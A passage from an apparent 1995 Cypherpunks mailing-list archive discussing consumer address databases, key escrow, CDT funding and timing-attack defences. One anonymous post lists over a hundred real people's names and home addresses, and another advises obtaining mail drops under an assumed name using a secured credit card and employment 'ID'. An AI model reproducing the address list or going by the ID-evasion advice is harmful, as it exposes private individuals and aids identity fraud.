structures and understand how the filesystem keeps file lists. Many vendor UNIces have fairly well commented header files. {Only marginally cypherpunk-related, in the 'Security in the real world' category.} - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMNDqmSoZzwIn1bdtAQGorwF+KsU/UZom/+C8ldvzKDPajDh6fiVtg1K1 kxTyLGyAjf5W+SNRM1f6kU5YdJlUmZxP =yo70 -----END PGP SIGNATURE----- From ecarp at netcom.com Thu Dec 14 20:56:25 1995 From: ecarp at netcom.com (Ed Carp (ecarp@netcom.com)) Date: Fri, 15 Dec 1995 12:56:25 +0800 Subject: ADDRESS DATABASE? Message-ID: <199512150028.SAA30583@khijol> > Date: Thu, 14 Dec 1995 13:06:50 -0800 > To: cypherpunks at toad.com > From: Bill Stewart > Subject: Re: ADDRESS DATABASE? > At 01:32 PM 12/14/95 -0600, you wrote: > >sandfort at crl.com said: > >> Something of privacy interest happened to me yesterday. I phoned a > >> company to ask for a copy of their catalog. The phone clerk asked > >> for my last name and zip code. After receiving that info, the clerk > >> asked me, "Is this your full name and address?" and then gave them > >> both correctly. I was taken aback. > > > > Taken aback? Its only going to get worse in the future. As Telcos, credit > >card companies, etc., start looking for new ways to make money I think > >selling information about you will increase dramatically. > > I'm in the process of moving and getting new phones, and Pac Bell asked me > if it was ok to send my Social Security Number to my long-distance carrier. > I told them "no, but you don't have my SSN anyway" "Oh, you're right, we don't; > can we have it" "No" "OK. Would you be willing to give us your driver's license > number or another form of ID? We've just started asking for this recently." > "Is it required?" "No, it's optional, but I have to ask" "No, thanks" You know why they want that, don't you? So if you don't pay your bill, they can ding your credit report. PG&E will do the same thing to you, and they will both do it illegally, without notifying you first as they are required to do by law. So, I'd advise you to check your credit report regularly for signs of abuse. From gimonca at mirage.skypoint.com Thu Dec 14 21:04:54 1995 From: gimonca at mirage.skypoint.com (Charles Gimon) Date: Fri, 15 Dec 1995 13:04:54 +0800 Subject: ADDRESS DATABASE? (fwd) Message-ID: Forwarded message: > From toad.com!owner-cypherpunks Thu Dec 14 17:36:57 1995 > Date: Thu, 14 Dec 1995 14:50:19 -0800 (PST) > From: Sandy Sandfort > > So far, no one has come up with anything stronger than specula- > tion about my database question. Some "anonymous" told me how > easy it was to buy *phone numbers* on CD-ROMs. Great, but I > didn't give the guy my phone number. > It was probably a shrewd guess on the part of the phone peon, combined with a fresh database from the telephone company. Are there many people in your zip code with the same last name as yourself? If not, that pretty much answers your question right there. When you pull a credit report from TRW's database, the only information TRW needs is the first four (?) letters of the last name, the initial of the first name, the numeric part of the address, the first character of the street name, and the zip code. I'll leave it to the experts in information theory to explain that in rigorous technical detail. Given only a last name and a zip code, I wouldn't be surprised if you found the proper individual most of the time. (If you're in Minnesota and you're looking for Swenson in 55419, you may need more info, but not much.) Another anecdote to add to the pile: I moved to a new apartment last May. For various reasons, I got an unlisted number, and had my credit card bills and magazine subscriptions sent to a mail drop (MBE). The phone, gas, electric and cable bills went to the new apartment, not to the mail drop. I didn't get any junk mail at the new apartment until a couple of weeks ago--right after I changed my subscription to Byte to come here (now I'm getting AOL disks, etc.). Before that, I got no junk mail here (except from the phone or cable company). I get almost no telemarketing calls; I used to get at least one a night with a listed phone number. My experience appears to be that credit card and magazine companies sell lists; utility and cable companies don't. Mass mailers must not get unlisted number customers on the lists they get from the phone company. Again, this is only from my experience, all disclaimers apply. And all this has no relevance whatsoever when you bring the government into the picture. Crypto relevance? Well, I did mention information theory... From futplex at pseudonym.com Thu Dec 14 21:49:46 1995 From: futplex at pseudonym.com (Futplex) Date: Fri, 15 Dec 1995 13:49:46 +0800 Subject: NIST GAK meeting writeup, LONG part 3 of 3 In-Reply-To: Message-ID: <199512150148.UAA00854@opine.cs.umass.edu> jim bell writes: > It _is_ less voluntary, because it interferes with my right to escrow my key > with an organization that is willing to take the dispute to arbitrary levels > of uncooperativeness with the government. I might insist, for example, that > the organization only store the key outside the country (beyond the reach of > US Courts) and require MY PERMISSION for them to release it to the > government. I might also insist that they further encode the key so that > only an independent foreign organization (out of reach of US courts) could > provide the key to decrypt it. > > If key escrow is REALLY REALLY REALLY "voluntary", then such arbitrary > restrictions should be do-able. Unless I've missed something large, you can have an _uncertified_ key escrow agent store your keys in Fidel Castro's beard, and only release them with written permission from your goldfish. Whether or not you use a certified key escrow agency would remain your choice, AFAIK. I'm not expressing support for the certification standards that have been presented. But I don't consider it cause for great alarm that the USG wants to play in the escrow agent rating bureau business. -Futplex From alano at teleport.com Thu Dec 14 21:50:04 1995 From: alano at teleport.com (Alan Olsen) Date: Fri, 15 Dec 1995 13:50:04 +0800 Subject: And the standard continues to lower... Message-ID: <2.2b7.32.19951215013346.008d4434@mail.teleport.com> At 05:17 PM 12/13/95 -0600, you wrote: >Dr. Brian L. Crissey includes in his .sig, courtesy of cactus at hks.net >[ much WRT YetAnotherSecureInternetCreditCardPaymentSystem(*tm) deleted ] >> ***Dr. Brian L. Crissey, Chair CS Dpt, Linfield Col., McMinnville, OR 97128 >> (503)-434-2426 brianc at linfield.edu >> Professionals built the Titanic, amateurs built the Ark... > >However, the Ark was *designed* by GOD (if you believe the story). Can Dr. >Brian L. Crissey say the same thing about his payment system? He seems to think so... He is so assured as to the security of his system. I am going to ask if I can post his challenge he made to me in private e-mail here. He needs to be taught some basics in security. (I do not have the proper hardware to subvert his scheme. I do have some other ways of subverting it, but that would be telling... (I occasionally assist with the web server on Teleport. Changing his script to collect information would not be difficult...)) I will see if he will let me forward his e-mail to the list. (I will also check with the webmistress on Teleport before I do... She might get pissed if I turned the people on the list onto Teleport's server.) | What is the Eye in the Food Pyramid? | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | | From llurch at networking.stanford.edu Thu Dec 14 21:53:24 1995 From: llurch at networking.stanford.edu (Richard Charles Graves) Date: Fri, 15 Dec 1995 13:53:24 +0800 Subject: Another One-Time Pad Reference Message-ID: <199512150151.RAA09562@Networking.Stanford.EDU> http://www.atria.com/~dawson/tbtf/archive/0044.html From andrew_loewenstern at il.us.swissbank.com Thu Dec 14 21:55:41 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Fri, 15 Dec 1995 13:55:41 +0800 Subject: e-mail forwarding, for-pay remailers Message-ID: <9512132329.AA01184@ch1d157nwk> E. Allen Smith writes: > There's one problem with this in regards to the "no necessary > connection," and that 's the governmental requirement for mail > forwarding. MBE and any legal other one will want to see at least > two forms of ID including one photo, and have a form that they fill > out using that and send to the local post office. Anyone have a > way around this problem? Why does an account provider need a snail-address and phone-number? Usually for billing purposes. However, this isn't necessary for accounts paid with ECash. I believe C2.org already offers non-dialup access accounts, paid for with ECash, that do not require a valid snail-address or phone-number. I am sure that there will be many more to come. andrew From nobody at REPLAY.COM Thu Dec 14 22:42:02 1995 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 15 Dec 1995 14:42:02 +0800 Subject: ADDRESS DATABASE? Message-ID: <199512150601.HAA14657@utopia.hacktic.nl> -----BEGIN PGP SIGNED MESSAGE----- Some "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . " wrote: >C'punks, > >So far, no one has come up with anything stronger than specula- >tion about my database question. Some "anonymous" told me how >easy it was to buy *phone numbers* on CD-ROMs. Great, but I >didn't give the guy my phone number. You don't get it, do you? Sandfort A & K Irvine, CA 92714 Sandfort Christine San Jose, CA 95113 Sandfort Curtis J 19841 River Rd Gladstone, OR 97027-2285 Sandfort D 105 Cypress Ave Santa Cruz, CA 95062-3710 Sandfort D O 780 N Circle D Way Tucson, AZ 85748-3845 Sandfort Glenn & Sophia 24314 Carter Rd Bothell, WA 98021-9413 Sandfort Jack 4057 Lower Honoapiilani Rd Wailuku, HI 96793 Sandfort Jack L 6761 Hwy 49 N Mariposa, CA 95338 Sandfort Joe 1203 SE Malden St Portland, OR 97202-5935 Sandfort Rebecca F 1111 E Apache Blvd Tempe, AZ 85281-8600 Sandfort Rick 850 Kimball Rd Red Bluff, CA 96080-4533 Sandfort Robert & Marian 8575 Rue Jenny Ln Los Molinos, CA 96055-9729 Sandfort Robert Jr & Joann 859 Locust St Red Bluff, CA 96080-4218 Sandfort Astrid 3 Channing Cir Cambridge, MA 02138-4715 Sandfort D 640 Sfourth Ave Pleasantville, NJ 08232 Sandfort E 2641 Ridge Ave Pleasantville, NJ 08233 Sandfort Ed & Donna 15 Kristin Way Trenton, NJ 08690-2441 Sandfort Edward 8 Sixpence Ct Huntington, NY 11743-6436 Sandfort G B 187 E 7th St Clifton, NJ 07011-1739 Sandfort John 19 Sanfort Ln Warwick, NY 10990-3136 Sandfort K 10 Annette Dr Portsmouth, RI 02871-3704 Sandfort Karl Spencer Rd Red Hook, NY 12571 Sandfort Peter & Sandr 9 Peach Hill Ct Ramsey, NJ 07446-1226 Sandfort Phil P 3907 Rippleton Rd Cazenovia, NY 13035-9602 Sandfort R 481 Smithburg Ct Jackson, NJ 08527-4444 Sandfort Sherri 434 W 52nd St New York, NY 10019-6340 Sandfort Thomas D 1819 Beach Blvd Point Pleasant, NJ 08742-5218 Sandfort A 235 Larry St Augusta, KS 67010-1906 Sandfort Brad Catrock Rd Lake Ozark, MO 65049 Sandfort Brian 1215 11th St West Des Moines, IA 50265-2574 Sandfort Charles RR 3 Humboldt, NE 68376-9803 Sandfort David G 3610 W Clay St Saint Charles, MO 63301-4433 Sandfort David G Cpa 3660 W Clay St Saint Charles, MO 63301-4433 Sandfort David L 820 Timberwood Cir Mc Kinney, TX 75069-9183 Sandfort Ed Rm 307 1043 10th Humboldt, NE 68376 Sandfort Edward L 4436 Windsor Ave Kansas City, MO 64123-1736 Sandfort Fred F 1655 S Grorgetown Wichita, KS 67208 Sandfort G 133 Kunze Dr Saint Charles, MO 63303-5928 Sandfort G H 9802 NW Shaggy Bark Ln Kansas City, MO 64152-2560 Sandfort Gerhard 1813 S Washington St Casper, WY 82601-4853 Sandfort Gerhard Jr & Melanie 1500 W Odell Ave Casper, WY 82604-4708 Sandfort Harold & Jackie RR 2 Box 209a Fremont, NE 68025-9696 Sandfort Howser RR 3 Eldon, MO 65026-9803 Sandfort Irvin J 3614 W Clay St Saint Charles, MO 63301-4433 Sandfort J 3229 Herrington Dr Casper, WY 82604-5421 Sandfort James 844 Hollyridge Dr Ballwin, MO 63011-3552 Sandfort Jane L 6009 Sandhurst Ln Dallas, TX 75206-4730 Sandfort John R 214 Columbia St Augusta, KS 67010-1535 Sandfort Kay 1024 S Spruce St Casper, WY 82601-3621 Sandfort Keith 1315 East Ave Holdrege, NE 68949-1323 Sandfort Larry 3034 W State St Springfield, MO 65802-5168 Sandfort Leland K Catrock Rd Lake Ozark, MO 65049 Sandfort Loyd 108 W Brockman Ave Eldon, MO 65026-2206 Sandfort Melvin 114 N Benton Ave Saint Charles, MO 63301-2708 Sandfort Michael 844 Judson St Lincoln, NE 68521-2633 Sandfort Michael RR 1 Talmage, NE 68448-9801 Sandfort Neil 623 N 6th St Seward, NE 68434-1405 Sandfort Robert RR 1 Brock, NE 68320-9801 Sandfort Robert M 3612 W Clay St Saint Charles, MO 63301-4433 Sandfort Roger RR 3 Eldon, MO 65026-9803 Sandfort Ross 303 9th Brock, NE 68320 Sandfort S C Rt 1 Box 145-Dd Augusta, KS 67010 Sandfort Sara 202 Manor Dr Eldon, MO 65026-9678 Sandfort Waldo D 2150 Randolph St Saint Charles, MO 63301-0844 Sandfort Wayne W 6969 Brentwood Ct Arvada, CO 80004-1900 Sandfort Wm PO Box 1393 Lake Ozark, MO 65049-1393 Sandfort Eva Rl Est 901 S Pine St Spartanburg, SC 29302-3310 Sandfort Eva Rlest 901 S Pine St Spartanburg, SC 29302-3310 Sandfort F 108 Thistle Knoll Ct Asheville, NC 28803-2014 Sandfort John P 209 Woodgrove Trce Spartanburg, SC 29301-6431 Sandfort John W 6540 Greyledge Ct Alexandria, VA 22310-2410 Sandfort Mark R Oakdale, PA 15071 Sandfort Marni 2140 L St NW Washington, DC 20037-1510 Sandfort Raymond Warren Center, PA 18851 Sandfort Ruth A 111 Jonthnct Oakdale, PA 15071 Sandfort Sarah 114 Maury Ave Charlottesville, VA 22903-3058 Sandfort Clarence 1016 Highway 63 Baldwin, WI 54002 Sandfort Daryl L 12676 W Hart St Waukegan, IL 60087-1122 Sandfort David J 14 Wintergreen Ct Downers Grove, IL 60517-1713 Sandfort E F 2400 S Finley Rd Lombard, IL 60148-7029 Sandfort Gary 340 N Plum St Carlinville, IL 62626-1316 Sandfort George 1380 Maple St Baldwin, WI 54002-9395 Sandfort J 300 3rd St Ann Arbor, MI 48103-4307 Sandfort J 6947 N Elm Tree Rd Milwaukee, WI 53217-3705 Sandfort James 34217 N Stonebrdg Ln Grayslake, IL 60030 Sandfort James 314 Oakridge Dr N Hudson, WI 54016-1117 Sandfort John 3101 N 13th St Terre Haute, IN 47804-1233 Sandfort John P 3149 N Mountain Maple Ct South Bend, IN 46628-3716 Sandfort Larry 8225 Knox Ave S Minneapolis, MN 55431-1413 Sandfort M Thos 2034 Chandler Ln Columbus, IN 47203-4015 Sandfort Melissa 910 Lake St Evanston, IL 60201-4319 Sandfort Melissa 706 Seward St Evanston, IL 60202-2946 Sandfort Mike 7394 Christie Chapel Rd Dublin, OH 43017-2415 Sandfort R W 275 E Dunedin Rd Columbus, OH 43214-3803 Sandfort Ronald G 602 21st Ave W Menomonie, WI 54751-3825 Sandfort Stephen 607 Washington Blvd Oak Park, IL 60302-3954 Sandfort Stephen & Rebecca 218 Second Sheb Fls Sheboygan Falls, WI 53085 Sandfort Steve 2654 Briarcliffe Ave Cincinnati, OH 45212-1306 Sandfort A M 2903 Nepperhan Rd Louisville, KY 40218-4715 Sandfort Christopher 10209 Barkley Dr Jeffersontown, KY 40299-3120 Sandfort Federick H 2495 Paddock Way Oviedo, FL 32765-8067 Sandfort Greg 1125 Carpenters Trce Covington, KY 41017-4416 Sandfort J 1550 NE 191st St Miami, FL 33179-4145 Sandfort Jeff 132 Landing Cir Hazel Green, AL 35750-8807 Sandfort John F 11 Estes Dr Bella Vista, AR 72714-5613 Sandfort Joseph & Lynn 311 Castle Blvd Paris, KY 40361-2455 Sandfort M 14191 Georgian Cir Fort Myers, FL 33912-5646 Sandfort Michael & Deb 457 Sun Lake Cir Lake Mary, FL 32746-3332 Sandfort Phillip L 4623 Soundside Dr Gulf Breeze, FL 32561-9275 Sandfort Road Assembly Of God 205 26th Ct Phenix City, AL 36869-6463 Sandfort Scott & Robyn 401 E Intendencia St Pensacola, FL 32501-6139 Sandfort Tad Rev 8304 Quail Run Dr Zephyrhills, FL 33544-2048 Sandfort Terry N 1680 NE 191st St Miami, FL 33179-4102 Sandfort Weldon W 407 Rock St Dardanelle, AR 72834-3402 This took about a minute using a shabby consumer-level DB. *Now* do you get it? Hieronymous -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBMNEPY73g0mNE55u1AQGE7AH/VmrgEKI1cf3QoF3sR+tUqjOsbp/5OgOd nFhuSPro8+W2wJIdNcQ8n4oyo1ecm6UCN90HUBycie5Xh5c4Zebc+A== =WWU1 -----END PGP SIGNATURE----- From clarkm at cnct.com Thu Dec 14 23:19:17 1995 From: clarkm at cnct.com (clarkm at cnct.com) Date: Fri, 15 Dec 1995 15:19:17 +0800 Subject: Fwd: Corporate Crime and CDT Funding on behalf of so-called medical privacy Message-ID: <9512150734.AA0051@cnct-gw.new-york.net> Thanks (belatedly) for posting this, Russell. Who was it said, "Follow the money." Great stuff. For a good time, call the EFF about these folks. For a better time, call the ACLU. It might be hilarious to make some inquiries around Stanford... Maybe Rich Graves can give us the poop. Best, Clark Probably time someone wrote an expose of industry and cryptocrats "hacking" public policy groups. Wonder where one could PLAGIARIZE such tidbits? ;-) (apologies -- "plagiarize" is an inside joke for the filterslugs ;-) //--- forwarded letter --------------------------------------- > MIME-Version: 1.0 > Date: Tue, 21 Nov 95 12:01:10 -0500 > From: JWRCLUM at aol.com > To: cypherpunks at toad.com > Subject: Fwd: Corporate Crime and CDT Funding on behalf of so-called medical privacy > The following article appeared in the current issue of > Corporate Crime Reporter (Volume 9, Number 44, November 20, 1995, > page one). It is redisseminated on the Internet with the > permission of CCR. > > SELF-PROCLAIMED "PUBLIC INTEREST" GROUP HEAVILY FUNDED BY > COMPUTER, TELECOMMUNICATIONS, DATABANK CORPORATIONS THAT WOULD > BENEFIT FROM "MEDICAL PRIVACY" LEGISLATION GROUP SUPPORTS -- > EQUIFAX, TRW, DUNN & BRADSTREET IN THE MIX > > The Center for Democracy & Technology (CDT), a self- > proclaimed "public interest organization," is in fact heavily > funded by large private computer, telecommunications, and > databank corporations. > Funders of CDT, a two-year old Washington, D.C.-based > advocacy organization, include Dunn & Bradstreet Corp., Equifax > Inc., and TRW Information Services, three large databank > corporations that stand to benefit from federal legislation CDT > actively helped shaped and is shepherding through Congress. > This year, CDT has received $699,643 from more than 30 large > corporations, including $100,000 from Microsoft, $75,000 from > AT&T, $60,000 from Bell Atlantic, $50,000 from Apple Computer, > $25,000 from IBM, $10,000 from TRW Information Services, $10,000 > from Dunn & Bradstreet, $5,000 from Direct Marketing Association, > and $5,000 from Equifax Inc. (For a complete list of CDT's > funders, see At A Glance, page 16) > At a hearing before the Senate Labor and Human Resources > Committee last week, CDT deputy director Janlori Goldman said > that CDT "strongly supports" legislation, S. 1360, sponsored by > Senators Robert Bennett (R-Utah) and Patrick Leahy (D-Vermont), > because it represents "the most comprehensive and strong privacy > bill the Congress has yet considered in this area." > But opponents of the bill argue that the legislation is not > a privacy statute at all, but instead is a vehicle that would > legitimize the creation of large computerized databanks of > personal medical information, thus benefitting those companies > like TRW and Equifax that give financial support to CDT. The > legislation would allow for broad, unauthorized searches of those > databanks, opponents claim. > In an interview, Goldman told Corporate Crime Reporter that > all of CDT's corporate funding is earmarked for other projects > and that none of the corporate funding is supporting her work on > the medical privacy bill. > "The corporate funding is not related at all, in any way > shape or form to my work on this bill," Goldman said. "The reason > we are doing this bill is that I've worked on privacy issues for > a decade. The most important privacy issue to work on is the > passage of the medical records privacy legislation. That is a > very sincere issue for me." > "None of the corporate support that CDT gets is related to > my work on this bill," Goldman emphasized. "None. Zippo." > CDT's executive director, Jerry Berman agreed. "We have no > funding for the medical privacy project -- zero," Berman said. > But critics of the CDT's position on the legislation were > skeptical. > "During the Senate hearing this week, Senator Bennett was > angered at the suggestion that S. 1360 was an industry bill," > said Jamie Love of Ralph Nader's Center for Study of Responsive > Law. "He claimed that he had widely consulted with privacy groups > and patient advocates. CDT's Janlori Goldman was the key person > who decided who was in the loop, and who was not in the loop on > this issue. Groups that were not receptive to the idea of massive > database systems of personal medical records were excluded from > deliberations." > "To find out that CDT has been funded by companies such as > Equifax, TRW, Dunn & Bradstreet, IBM and the telephone companies > is remarkable, because these are among the groups who have the > most at stake in legitimizing and preserving the current system > of maintaining and managing medical records," Love said. "I think > that Janlori Goldman should have mentioned in her Senate > testimony that CDT was funded by corporations who have an > interest in this issue." > "If CDT were doing its job, TRW and Equifax wouldn't want to > give it money," Love added. > Harold Eist, president-elect of the American Psychiatric > Association, said that "any datagathering and large computer > company would clearly benefit from legislation that drives large > amounts of individually identified data about American citizens > into data banks without the knowledge and permission of those > American citizens." > "Selling that information would represent a gold mine for > those companies," Eist said. > "It is not surprising that an organization with a > disingenuous name -- Center for Democracy & Technology -- would > be supporting a bill with a disingenuous name -- The Medical > Records Confidentiality Act," Eist said. "In fact, this bill > represents an effort to give away the privacy of American > citizens without their knowledge." > "My understanding is that Janlori Goldman was involved in > writing the bill," Eist said. "It seems to me that as a former > civil libertarian, she should know very well that there are > loopholes in that bill regarding protections to privacy that you > could drive a Mack truck through." > "Unless people can be assured that their privacy will be > protected, there is little or no chance that they will reveal the > kind of tormented and dark secrets that they have to reveal to > recover from their illnesses," Eist said. "Confidentially is the > sine qua non of medical treatment, and especially if it is > psychiatric medical treatment." > A driving force behind the effort to derail the > Bennett/Leahy bill is Denise Nagel, a Boston physician who > organized the Coalition for Patient Rights of New England "to > restore confidentiality to the doctor-patient relationship." > Nagel refused to comment on CDT's funding. > At the Senate hearing last week, Nagel told the committee "I > have no industry ties." > Nagel charged that S. 1360 was written "to advance the > interests of certain segments of the computer, > telecommunications, data processing and health-care industries." > "With this bill they would be able to careen full speed > ahead to develop data networks that will give innumerable people > access to our medical records legally and without our knowledge," > Nagel said. > "I am convinced that S. 1360 is not at all primarily > concerned with the confidentiality of medical records," Nagel > told the committee. "It is just the opposite. It talks about > informed consent, but then authorizes the creation of databases > without patient knowledge or consent. It talks about individual > rights, and then allows police broad authority to search > databases directly instead of obtaining a specific record from > the patient's doctor. It talks about civil and criminal > sanctions, and then pre-empts all common law and most existing > and future state statutes. It talks about ensuring personal > privacy with respect to medical records, and then sets a ceiling > rather than a floor on medical confidentiality." > > AT A GLANCE: CENTER FOR DEMOCRACY AND TECHNOLOGY FUNDING, 1994- > 1995 > > American Advertising Federation 500.00 > America Online, Inc. 25,000.00 > Apple Computer Inc. 50,000.00 > AT&T 75,000.00 > Bell Atlantic 60,000.00 > Business Software Alliance 6,000.00 > Cellular Tellecomm Indust Assn 10,000.00 > CompuServ 30,000.00 > Delphi Internet Services Corp 10,000.00 > Direct Marketing Association 5,000.00 > Dunn & Bradstreet Corp 10,000.00 > EMA 5,000.00 > Equifax Inc. 5,000.00 > John Gilmore 2,500.00 > Hartford Foundation 153,000.00 > IBM 25,000.00 > Information Technology Industry 5,000.00 > Interactive Digital Software 5,000.00 > Lotus 6,250.00 > MARC 80,000.00 > MCI Telecommunications 15,000.00 > Microsoft 100,000.00 > National Cable Television Assn 15,000.00 > Netscape Communications Corp 5,000.00 > Newspaper Association of Am 5,000.00 > Nynex Government Affairs 25,000.00 > Pacific Telesis 25,000.00 > Prodigy Service Company 10,000.00 > Software Publishers Assn 10,000.00 > Time Warner Inc 5,000.00 > TRW Information Svcs 10,000.00 > US Telephone Association 10,000.00 > US West Inc 10,000.00 > > Total Funding 814,020.00 > > Received 1994 114,377.00 > Received 1995 699,643.00 > > Total Funding 814,020.00 > > > > Russell Mokhiber > russell at essential.org > voice: 202/429-6928 > [big birdie follows] .---. .----------- * :::::::::::::::::::::::::::: / \ __ / ------ * clark.matthews at paranet.org / / \(..)/ ----- * :::::::::::::::::::::::::::: ////// ' \/ ` ---- * //// / // : : --- * PERMISSION TO \\/ / * / /` '--* COPY / REPOST \*/ * //..\\ x-x-UU----UUx-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x '//||\\` N E M O..M E..I M P U N E..L A C E S S I T x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x From sandfort at crl.com Fri Dec 15 16:18:52 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Fri, 15 Dec 95 16:18:52 PST Subject: ADDRESS DATABASE? In-Reply-To: <199512151901.UAA10562@utopia.hacktic.nl> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Fri, 15 Dec 1995, Anonymous wrote: > It's kind of cool how much faith you have in the idea that > your number is unlisted, considering the fact that you started > this thread by griping that someone had the goods on you. The > reason you were "taken aback" is because your beliefs don't > correspond to reality -- "cognitive dissonance," in the lingo. 1) I have no faith in my number being unlisted, I merely mentioned my contractural expectation. 2) I was not griping. I was requesting information (of which "Anonymous" is apparently bereft). 3) Being "taken aback" refers to surprise (look it up). Far from the meaning of "cognitive dissonance." "Assuming facts not in evidence," in the lingo. So what DO you know, "Anonyomous"? S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From ncognito at gate.net Fri Dec 15 01:31:52 1995 From: ncognito at gate.net (Ben Holiday) Date: Fri, 15 Dec 1995 17:31:52 +0800 Subject: Secured RM ? (source) In-Reply-To: <199512150218.VAA14539@homeport.org> Message-ID: On Thu, 14 Dec 1995, Adam Shostack wrote: > From comp.unix.questions FAQ: > (http://www.cis.ohio-state.edu/hypertext/faq/usenet/unix-faq/faq/part3/faq-doc-6.html) > > MIT's Project Athena has produced a comprehensive > delete/undelete/expunge/purge package, which can serve as a > complete replacement for rm which allows file recovery. This > package was posted to comp.sources.misc (volume 17, issue > 023-026) Well, thanks for trying.. The athena package isnt an undelete program, its a replacement for rm that copies rm'd files into a trashcan directory which is expunged at regular intervals... *sigh* Still looking.. From tcmay at got.net Fri Dec 15 01:35:52 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 15 Dec 1995 17:35:52 +0800 Subject: "Strongly Voluntary" Key Escrow Message-ID: At 11:18 PM 12/14/95, jim bell wrote: >I disagree. The issue is one that might be called "standing." Who, >exactly, is responsible to whom in such an arrangement. Let's suppose key >escrow (for keys for non-exported encryption devices) is REALLY VOLUNTARY. >In that case, the escrow agent's only legal responsibility is to the owner >of the encryption device. The government isn't a party to this voluntary >arrangement, and thus hasn't a complaint if the escrow agent refuses to comply. > >I could, for example, enter into a voluntary arrangement with an escrow >agent so that he would be obligated to erase the key no more nor less than 5 >days after he received it. If he did so 1 day after, and I needed the key, >he would have breached his obligation to ME, but not to the government. >Likewise, if he failed to erase the key, he would likewise be breaching his >agreement with me. I agree with this analysis. When key escrow was being debate in the summer of '94 here, I called this criterion the basis for a "strongly voluntary" system. Specifically, that one could have the bit bucket as an "escrow agent," with of course no retrieval by the government. Or one's lawyer, or one's spouse, or an offshore bank, and so on. All of these are "voluntary" key escrow (though I hate that misuse of the word "escrow") systems. None of them involve government certification, and there are few circumstances where I think "government certification" is even useful, let alone necessary. Any scheme in which the government interjects itself in what would not normally involve them can hardly be said to be strictly voluntary. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From rsalz at osf.org Fri Dec 15 02:16:38 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 15 Dec 1995 18:16:38 +0800 Subject: OSF security announcement Message-ID: <9512132353.AA16969@sulphur.osf.org> There are two or three dce-web folks on this list, so if anyone has questions after reading the web pages (http://www.osf.org/www/dceweb), drop me a line or post. /r$ From nobody at REPLAY.COM Fri Dec 15 02:22:45 1995 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 15 Dec 1995 18:22:45 +0800 Subject: mailing list Message-ID: <199512150910.KAA21650@utopia.hacktic.nl> On 15 Dec 95 at 1:13, JerelRobertson wrote: > Hey I want to get on this list. How do I do it? There's a test, Jerel. You may retake it in three months. We From mab at research.att.com Fri Dec 15 02:56:29 1995 From: mab at research.att.com (Matt Blaze) Date: Fri, 15 Dec 1995 18:56:29 +0800 Subject: simple Unix CPU time quantization functions available Message-ID: <199512130702.CAA24131@nsa.tempo.att.com> I've made available a simple CPU time quantization package that provides a simple interface to encapsulate code blocks that must run in a multiple of a coarse-grained "quantized" amount of CPU time. It is useful in building various on-line cryptographic protocols in which an attacker could otherwise learn key information by observing the time the target takes to perform calculations that use the secret (c.f., Paul Kocher's recent attacks). The basic idea is that you can specify a "quantum" such that at the end of an encapsulated block the CPU will busy-wait until the next quantum multiple. Fine-grained (below the quantum) timing information is thereby denied to the observer (including unprivileged processes on the same machine). The code is quick-and-dirty and only runs on Unix-centric platforms. Test and use at your own risk. There are (basically) no restrictions on the use or distribution of the (very simple) code. Get it from: ftp://research.att.com/dist/mab/quantize.shar The quantize package is also part of Jack Lacy's cryptolib package (watch this space for details). -matt From lull at acm.org Fri Dec 15 04:29:58 1995 From: lull at acm.org (John Lull) Date: Fri, 15 Dec 1995 20:29:58 +0800 Subject: ADDRESS DATABASE? In-Reply-To: Message-ID: <30d162b0.1566429@smtp.ix.netcom.com> On Thu, 14 Dec 1995 14:50:19 -0800 (PST), Sandy Sandfort wrote: > So far, no one has come up with anything stronger than specula- > tion about my database question. Some "anonymous" told me how > easy it was to buy *phone numbers* on CD-ROMs. Great, but I > didn't give the guy my phone number. These CD-ROMs can be searched for most any combination of name, street name, city, state, zip and area code. Given a relatively uncommon name and a zip code, it's not surprising they could come up with only one hit. From frissell at panix.com Fri Dec 15 05:12:33 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 15 Dec 1995 21:12:33 +0800 Subject: e-mail forwarding, for-pay remailers Message-ID: <2.2b8.32.19951215121704.0089daa8@panix.com> At 01:20 PM 12/14/95 EDT, E. ALLEN SMITH wrote: > The more critical question is likely to be what the people at the local >MBE/whatever _think_ the rules are. When I last got a box (under my real name, >in case anyone's wondering), I seem to recall that they'd accept credit cards. >Once one has one box under a given name, this opens up the possibility of >getting a secured credit card to make future access easier. However, I believe >that they do want at least one form of photo ID; I can't remember just off what >their specifications were. > -Allen I have found that credit cards are very good ID (even though they aren't ID at all) since people are sure that you can't get one without getting thoroughly checked out. A secured credit card in a nome de guerre backed up with employment photo "ID" will usually get you what you want. The 